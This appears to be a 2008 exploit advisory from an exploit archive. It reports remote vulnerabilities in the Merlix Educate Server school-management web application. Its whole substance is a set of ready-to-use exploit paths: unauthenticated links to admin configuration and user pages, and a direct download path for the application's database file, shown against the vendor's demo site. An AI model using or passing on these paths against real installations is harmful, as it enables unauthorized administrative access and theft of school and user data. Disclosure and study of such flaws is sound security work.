id: 4356
date: 12/05/2008
title: Merlix Educate Servert (Bypass/DD) Multiple Remote Vulnerabilities
author: ZoRLu
cves: 

==================================================================
Merlix Educate Servert (Bypass/DD) Multiple Remote Vulnerabilities
==================================================================


[~] Merlix Educate Servert Bypass/DD Multiple Remote Vuln
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------

exp for demo: ( Bypass )

http://demo.merlix.com/school/admin/config.asp

http://demo.merlix.com/school/admin/users.asp

exp for demo: ( DD )

http://demo.merlix.com/school/db/db.mdb

[~]----------------------------------------------------------------------



#  0day.today [2023-03-24]  #